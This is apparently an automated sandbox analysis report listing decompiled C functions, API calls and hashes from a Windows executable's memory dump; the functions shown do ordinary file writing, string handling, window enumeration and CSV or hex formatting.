                                                                                                                                                                                                                          • Instruction ID: a803108f18d13bdb161ef9cfeaea96f484be20865a03d7d0c1e8cd60aac843f5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02F01DB1A4010CFEEB018FD59DC1DAF7BBDEB89755F104479F604E6150D2709E41AB64
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004072D8, Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                                                          			E004072D8(void* __ecx, void* __eflags, void* _a4, short* _a8) {
				long _v8;
				void _v8199;
				char _v8200;

				E0040B550(0x2004, __ecx);
				_v8200 = 0;
				memset( &_v8199, 0, 0x1fff);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
			}






                                                                                                                                                                                                                          0x004072e0
                                                                                                                                                                                                                          0x004072f7
                                                                                                                                                                                                                          0x004072fd
                                                                                                                                                                                                                          0x00407316
                                                                                                                                                                                                                          0x00407342

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004072FD
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00407316
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00407328
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00407339
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2754987064-0
                                                                                                                                                                                                                          • Opcode ID: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                                                                                                                                                          • Instruction ID: b20814eff52bbcc052d034fa9df9783175f47b69a9638c3bed99c582471ba408
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7F0FFB740022CBEEB05A7949DC9DDB776CDB08358F0001B6B715E2192D6749E448BA8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00408DC8, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00408DC8(void** __eax, struct HWND__* _a4) {
				int _t7;
				void** _t11;

				_t11 = __eax;
				if( *0x4101b4 == 0) {
					memcpy(0x40f5c8,  *__eax, 0x50);
					memcpy(0x40f2f8,  *(_t11 + 4), 0x2cc);
					 *0x4101b4 = 1;
					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E00408ADB, 0);
					 *0x4101b4 =  *0x4101b4 & 0x00000000;
					 *0x40f2f4 = _t7;
					return 1;
				} else {
					return 1;
				}
			}





                                                                                                                                                                                                                          0x00408dd0
                                                                                                                                                                                                                          0x00408dd2
                                                                                                                                                                                                                          0x00408de2
                                                                                                                                                                                                                          0x00408df4
                                                                                                                                                                                                                          0x00408e01
                                                                                                                                                                                                                          0x00408e1b
                                                                                                                                                                                                                          0x00408e21
                                                                                                                                                                                                                          0x00408e28
                                                                                                                                                                                                                          0x00408e30
                                                                                                                                                                                                                          0x00408dd4
                                                                                                                                                                                                                          0x00408dd8
                                                                                                                                                                                                                          0x00408dd8

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1386444988-0
                                                                                                                                                                                                                          • Opcode ID: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                                                                                                                                                          • Instruction ID: 2efff09082e6186f10957894d43819ba35d003f4fc085d6afb87634920226402
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FAF08231695310BBD7206BA4BE0AB473AA0D700B16F2484BEF241B54E0C7FA04559BDC
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004050E1, Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E004050E1(wchar_t* __edi, wchar_t* _a4) {
				int _t10;
				int _t12;
				void* _t23;
				wchar_t* _t24;
				signed int _t25;

				_t24 = __edi;
				_t25 = wcslen(__edi);
				_t10 = wcslen(_a4);
				_t23 = _t10 + _t25;
				if(_t23 >= 0x3ff) {
					_t12 = _t10 - _t23 + 0x3ff;
					if(_t12 > 0) {
						wcsncat(__edi + _t25 * 2, _a4, _t12);
					}
				} else {
					wcscat(__edi + _t25 * 2, _a4);
				}
				return _t24;
			}








                                                                                                                                                                                                                          0x004050e1
                                                                                                                                                                                                                          0x004050ec
                                                                                                                                                                                                                          0x004050ee
                                                                                                                                                                                                                          0x004050f5
                                                                                                                                                                                                                          0x004050ff
                                                                                                                                                                                                                          0x00405114
                                                                                                                                                                                                                          0x00405118
                                                                                                                                                                                                                          0x00405123
                                                                                                                                                                                                                          0x00405128
                                                                                                                                                                                                                          0x00405101
                                                                                                                                                                                                                          0x00405109
                                                                                                                                                                                                                          0x0040510f
                                                                                                                                                                                                                          0x0040512e

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcslen$wcscatwcsncat
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 291873006-0
                                                                                                                                                                                                                          • Opcode ID: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                                                                                                                                                          • Instruction ID: d151cadb35ebc04527c95d650d15a6f00d765f1fde14687ca002c1c28d544fc6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3CE0EC36908703AECB042625AC45C6F375DEF84368B50843FF410E6192EF3DD51556DD
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00402DDD, Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00402DDD(struct HWND__* __eax, void* __ecx) {
				void* __edi;
				void* __esi;
				struct HWND__* _t11;
				struct HWND__* _t14;
				struct HWND__* _t15;
				void* _t16;

				_t14 = __eax;
				_t16 = __ecx;
				 *((intOrPtr*)(__ecx + 0x10)) = __eax;
				GetClientRect(__eax, __ecx + 0xa14);
				 *(_t16 + 0xa24) =  *(_t16 + 0xa24) & 0x00000000;
				_t15 = GetWindow(GetWindow(_t14, 5), 0);
				do {
					E00402D99(_t15, _t16);
					_t11 = GetWindow(_t15, 2);
					_t15 = _t11;
				} while (_t15 != 0);
				return _t11;
			}









                                                                                                                                                                                                                          0x00402de0
                                                                                                                                                                                                                          0x00402de2
                                                                                                                                                                                                                          0x00402dec
                                                                                                                                                                                                                          0x00402def
                                                                                                                                                                                                                          0x00402dfb
                                                                                                                                                                                                                          0x00402e0c
                                                                                                                                                                                                                          0x00402e0e
                                                                                                                                                                                                                          0x00402e0e
                                                                                                                                                                                                                          0x00402e16
                                                                                                                                                                                                                          0x00402e18
                                                                                                                                                                                                                          0x00402e1a
                                                                                                                                                                                                                          0x00402e21

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetClientRect.USER32 ref: 00402DEF
                                                                                                                                                                                                                          • GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                                                                                                                                                          • GetWindow.USER32(00000000), ref: 00402E0A
                                                                                                                                                                                                                            • Part of subcall function 00402D99: GetWindowRect.USER32 ref: 00402DA8
                                                                                                                                                                                                                            • Part of subcall function 00402D99: MapWindowPoints.USER32 ref: 00402DC3
                                                                                                                                                                                                                          • GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$Rect$ClientPoints
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4235085887-0
                                                                                                                                                                                                                          • Opcode ID: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                                                                                                                                                          • Instruction ID: 77c271d885eafffee951e9f606c1c6e1ef1898ae553cc6e200c9330dee891b18
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8E092722407006BE22197398DC9FABB2EC9FC9761F11053EF504E7280DBB8DC014669
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040B6A6, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 72%
                                                                                                                                                                                                                          			E0040B6A6() {
				intOrPtr _t1;
				intOrPtr _t2;
				intOrPtr _t3;
				intOrPtr _t4;

				_t1 =  *0x41c458;
				if(_t1 != 0) {
					_push(_t1);
					L0040B272();
				}
				_t2 =  *0x41c460;
				if(_t2 != 0) {
					_push(_t2);
					L0040B272();
				}
				_t3 =  *0x41c45c;
				if(_t3 != 0) {
					_push(_t3);
					L0040B272();
				}
				_t4 =  *0x41c464;
				if(_t4 != 0) {
					_push(_t4);
					L0040B272();
					return _t4;
				}
				return _t4;
			}







                                                                                                                                                                                                                          0x0040b6a6
                                                                                                                                                                                                                          0x0040b6ad
                                                                                                                                                                                                                          0x0040b6af
                                                                                                                                                                                                                          0x0040b6b0
                                                                                                                                                                                                                          0x0040b6b5
                                                                                                                                                                                                                          0x0040b6b6
                                                                                                                                                                                                                          0x0040b6bd
                                                                                                                                                                                                                          0x0040b6bf
                                                                                                                                                                                                                          0x0040b6c0
                                                                                                                                                                                                                          0x0040b6c5
                                                                                                                                                                                                                          0x0040b6c6
                                                                                                                                                                                                                          0x0040b6cd
                                                                                                                                                                                                                          0x0040b6cf
                                                                                                                                                                                                                          0x0040b6d0
                                                                                                                                                                                                                          0x0040b6d5
                                                                                                                                                                                                                          0x0040b6d6
                                                                                                                                                                                                                          0x0040b6dd
                                                                                                                                                                                                                          0x0040b6df
                                                                                                                                                                                                                          0x0040b6e0
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040b6e5
                                                                                                                                                                                                                          0x0040b6e6

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                                          • Opcode ID: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                                                                                                                                                          • Instruction ID: 3bd5cb9a150004800b4bedd87e83f43d671674f7d7a0a5890c52a9af046e0154
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96E00261B8820196DD249A7AACD5D6B239C9A05794314847EF804E72E5DF39D44045ED
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00407362, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                                                          			E00407362(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				wchar_t* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				void* __edi;
				signed int _t39;
				wchar_t* _t41;
				signed int _t45;
				signed int _t48;
				wchar_t* _t53;
				wchar_t* _t62;
				void* _t66;
				intOrPtr* _t68;
				void* _t70;
				wchar_t* _t75;
				wchar_t* _t79;

				_t66 = __ebx;
				_t75 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t39 =  *( *((intOrPtr*)(_t66 + 0x30)) + _v8 * 4);
						_t68 = _a8;
						if(_t68 != _t75) {
							_t79 =  *((intOrPtr*)( *_t68))(_t39,  *((intOrPtr*)(_t66 + 0x60)));
						} else {
							_t79 =  *( *((intOrPtr*)(_t66 + 0x2d4)) + 0x10 + _t39 * 0x14);
						}
						_t41 = wcschr(_t79, 0x2c);
						_pop(_t70);
						if(_t41 != 0) {
							L8:
							_v20 = _t75;
							_v28 = _t75;
							_v36 = _t75;
							_v24 = 0x100;
							_v32 = 1;
							_v16 = 0x22;
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							while(1) {
								_t45 =  *_t79 & 0x0000ffff;
								__eflags = _t45;
								_v12 = _t45;
								_t77 =  &_v36;
								if(__eflags == 0) {
									break;
								}
								__eflags = _t45 - 0x22;
								if(__eflags != 0) {
									_push( &_v12);
									_t48 = 1;
									__eflags = 1;
								} else {
									_push(L"\"\"");
									_t48 = _t45 | 0xffffffff;
								}
								E0040565D(_t48, _t70, _t77, __eflags);
								_t79 =  &(_t79[0]);
								__eflags = _t79;
							}
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							_t53 = _v20;
							__eflags = _t53;
							if(_t53 == 0) {
								_t53 = 0x40c4e8;
							}
							E004055D1(E00407343(_t66, _a4, _t53),  &_v36);
							_t75 = 0;
							__eflags = 0;
						} else {
							_t62 = wcschr(_t79, 0x22);
							_pop(_t70);
							if(_t62 != 0) {
								goto L8;
							} else {
								E00407343(_t66, _a4, _t79);
							}
						}
						if(_v8 <  *((intOrPtr*)(_t66 + 0x2c)) - 1) {
							E00407343(_t66, _a4, ",");
						}
						_v8 = _v8 + 1;
					} while (_v8 <  *((intOrPtr*)(_t66 + 0x2c)));
				}
				return E00407343(_t66, _a4, L"\r\n");
			}























                                                                                                                                                                                                                          0x00407362
                                                                                                                                                                                                                          0x00407369
                                                                                                                                                                                                                          0x0040736e
                                                                                                                                                                                                                          0x00407371
                                                                                                                                                                                                                          0x00407378
                                                                                                                                                                                                                          0x0040737e
                                                                                                                                                                                                                          0x00407381
                                                                                                                                                                                                                          0x00407386
                                                                                                                                                                                                                          0x0040739f
                                                                                                                                                                                                                          0x00407388
                                                                                                                                                                                                                          0x00407391
                                                                                                                                                                                                                          0x00407391
                                                                                                                                                                                                                          0x004073a4
                                                                                                                                                                                                                          0x004073ac
                                                                                                                                                                                                                          0x004073ad
                                                                                                                                                                                                                          0x004073cd
                                                                                                                                                                                                                          0x004073d0
                                                                                                                                                                                                                          0x004073d3
                                                                                                                                                                                                                          0x004073d6
                                                                                                                                                                                                                          0x004073e0
                                                                                                                                                                                                                          0x004073e7
                                                                                                                                                                                                                          0x004073ee
                                                                                                                                                                                                                          0x004073f5
                                                                                                                                                                                                                          0x0040741a
                                                                                                                                                                                                                          0x0040741a
                                                                                                                                                                                                                          0x0040741d
                                                                                                                                                                                                                          0x00407420
                                                                                                                                                                                                                          0x00407423
                                                                                                                                                                                                                          0x00407426
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004073fc
                                                                                                                                                                                                                          0x00407400
                                                                                                                                                                                                                          0x0040740f
                                                                                                                                                                                                                          0x00407412
                                                                                                                                                                                                                          0x00407412
                                                                                                                                                                                                                          0x00407402
                                                                                                                                                                                                                          0x00407402
                                                                                                                                                                                                                          0x00407407
                                                                                                                                                                                                                          0x00407407
                                                                                                                                                                                                                          0x00407413
                                                                                                                                                                                                                          0x00407419
                                                                                                                                                                                                                          0x00407419
                                                                                                                                                                                                                          0x00407419
                                                                                                                                                                                                                          0x0040742f
                                                                                                                                                                                                                          0x00407434
                                                                                                                                                                                                                          0x00407437
                                                                                                                                                                                                                          0x00407439
                                                                                                                                                                                                                          0x0040743b
                                                                                                                                                                                                                          0x0040743b
                                                                                                                                                                                                                          0x0040744e
                                                                                                                                                                                                                          0x00407453
                                                                                                                                                                                                                          0x00407453
                                                                                                                                                                                                                          0x004073af
                                                                                                                                                                                                                          0x004073b2
                                                                                                                                                                                                                          0x004073ba
                                                                                                                                                                                                                          0x004073bb
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004073bd
                                                                                                                                                                                                                          0x004073c3
                                                                                                                                                                                                                          0x004073c3
                                                                                                                                                                                                                          0x004073bb
                                                                                                                                                                                                                          0x0040745c
                                                                                                                                                                                                                          0x00407468
                                                                                                                                                                                                                          0x00407468
                                                                                                                                                                                                                          0x0040746d
                                                                                                                                                                                                                          0x00407473
                                                                                                                                                                                                                          0x0040747c
                                                                                                                                                                                                                          0x0040748e

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 004073A4
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 004073B2
                                                                                                                                                                                                                            • Part of subcall function 0040565D: wcslen.MSVCRT ref: 00405679
                                                                                                                                                                                                                            • Part of subcall function 0040565D: memcpy.MSVCRT ref: 0040569D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcschr$memcpywcslen
                                                                                                                                                                                                                          • String ID: "
                                                                                                                                                                                                                          • API String ID: 1983396471-123907689
                                                                                                                                                                                                                          • Opcode ID: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                                                                                                                                                          • Instruction ID: 00b3f0686b04e7c82e40785714242b478475f00d1c6093d835cc4068bab83974
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E315F31E04208ABDF10EFA5C8819AE7BB9EF54314F20457BEC50B72C2D778AA41DB59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00401676, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 45%
                                                                                                                                                                                                                          			E00401676(void* __ecx, intOrPtr* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				char _v80;
				signed short _v65616;
				void* _t27;
				intOrPtr _t28;
				void* _t34;
				intOrPtr _t39;
				intOrPtr* _t51;
				void* _t52;

				_t51 = __esi;
				E0040B550(0x1004c, __ecx);
				_t39 = 0;
				_push(0);
				_push( &_v8);
				_v8 =  *((intOrPtr*)(_a4 + 0x1c));
				_push(L"Lines");
				_t27 =  *((intOrPtr*)( *__esi))();
				if(_v8 > 0) {
					do {
						_t6 = _t39 + 1; // 0x1
						_t28 = _t6;
						_push(_t28);
						_push(L"Line%d");
						_v12 = _t28;
						_push(0x1f);
						_push( &_v80);
						L0040B1EC();
						_t52 = _t52 + 0x10;
						_push(0x7fff);
						_push(0x40c4e8);
						if( *((intOrPtr*)(_t51 + 4)) == 0) {
							_v65616 = _v65616 & 0x00000000;
							 *((intOrPtr*)( *_t51 + 0x10))( &_v80,  &_v65616);
							_t34 = E004054DF(_a4, _t51,  &_v65616);
						} else {
							_t34 =  *((intOrPtr*)( *_t51 + 0x10))( &_v80, E00405581(_a4, _t39));
						}
						_t39 = _v12;
					} while (_t39 < _v8);
					return _t34;
				}
				return _t27;
			}













                                                                                                                                                                                                                          0x00401676
                                                                                                                                                                                                                          0x0040167e
                                                                                                                                                                                                                          0x0040168a
                                                                                                                                                                                                                          0x0040168c
                                                                                                                                                                                                                          0x00401690
                                                                                                                                                                                                                          0x00401691
                                                                                                                                                                                                                          0x00401696
                                                                                                                                                                                                                          0x0040169d
                                                                                                                                                                                                                          0x004016a2
                                                                                                                                                                                                                          0x004016aa
                                                                                                                                                                                                                          0x004016aa
                                                                                                                                                                                                                          0x004016aa
                                                                                                                                                                                                                          0x004016ad
                                                                                                                                                                                                                          0x004016ae
                                                                                                                                                                                                                          0x004016b3
                                                                                                                                                                                                                          0x004016b9
                                                                                                                                                                                                                          0x004016bb
                                                                                                                                                                                                                          0x004016bc
                                                                                                                                                                                                                          0x004016c1
                                                                                                                                                                                                                          0x004016c8
                                                                                                                                                                                                                          0x004016cd
                                                                                                                                                                                                                          0x004016ce
                                                                                                                                                                                                                          0x004016ea
                                                                                                                                                                                                                          0x004016ff
                                                                                                                                                                                                                          0x0040170c
                                                                                                                                                                                                                          0x004016d0
                                                                                                                                                                                                                          0x004016e3
                                                                                                                                                                                                                          0x004016e3
                                                                                                                                                                                                                          0x00401711
                                                                                                                                                                                                                          0x00401714
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00401719
                                                                                                                                                                                                                          0x0040171c

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _snwprintf
                                                                                                                                                                                                                          • String ID: Line%d$Lines
                                                                                                                                                                                                                          • API String ID: 3988819677-2790224864
                                                                                                                                                                                                                          • Opcode ID: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
                                                                                                                                                                                                                          • Instruction ID: 1021665491e9d2d06496d958327cd8fefc515fbb55266dd5f91e98284186a054
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C110071A00208EFCB15DF98C8C1D9EB7B9EF48704F1045BAF645E7281D778AA458B68
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040512F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 70%
                                                                                                                                                                                                                          			E0040512F(intOrPtr _a4, intOrPtr _a8, void* _a12) {
				void* _v8;
				void* _v26;
				void _v28;
				void* _t24;
				void* _t25;
				void* _t35;
				signed int _t38;
				signed int _t42;
				void* _t44;
				void* _t45;

				_t24 = _a12;
				_t45 = _t44 - 0x18;
				_t42 = 0;
				 *_t24 = 0;
				if(_a8 <= 0) {
					_t25 = 0;
				} else {
					_t38 = 0;
					_t35 = 0;
					if(_a8 > 0) {
						_v8 = _t24;
						while(1) {
							_v28 = _v28 & 0x00000000;
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosw");
							_push( *(_t35 + _a4) & 0x000000ff);
							_push(L"%2.2X ");
							_push(0xa);
							_push( &_v28);
							L0040B1EC();
							_t38 = _t42;
							memcpy(_v8,  &_v28, 6);
							_t13 = _t42 + 3; // 0x3
							_t45 = _t45 + 0x1c;
							if(_t13 >= 0x2000) {
								break;
							}
							_v8 = _v8 + 6;
							_t35 = _t35 + 1;
							_t42 = _t42 + 3;
							if(_t35 < _a8) {
								continue;
							}
							break;
						}
						_t24 = _a12;
					}
					 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
					_t25 = 1;
				}
				return _t25;
			}













                                                                                                                                                                                                                          0x00405132
                                                                                                                                                                                                                          0x00405135
                                                                                                                                                                                                                          0x00405139
                                                                                                                                                                                                                          0x0040513e
                                                                                                                                                                                                                          0x00405141
                                                                                                                                                                                                                          0x004051b3
                                                                                                                                                                                                                          0x00405143
                                                                                                                                                                                                                          0x00405145
                                                                                                                                                                                                                          0x00405147
                                                                                                                                                                                                                          0x0040514c
                                                                                                                                                                                                                          0x0040514e
                                                                                                                                                                                                                          0x00405151
                                                                                                                                                                                                                          0x00405151
                                                                                                                                                                                                                          0x0040515b
                                                                                                                                                                                                                          0x0040515c
                                                                                                                                                                                                                          0x0040515d
                                                                                                                                                                                                                          0x0040515e
                                                                                                                                                                                                                          0x0040515f
                                                                                                                                                                                                                          0x00405168
                                                                                                                                                                                                                          0x00405169
                                                                                                                                                                                                                          0x00405171
                                                                                                                                                                                                                          0x00405173
                                                                                                                                                                                                                          0x00405174
                                                                                                                                                                                                                          0x00405182
                                                                                                                                                                                                                          0x00405184
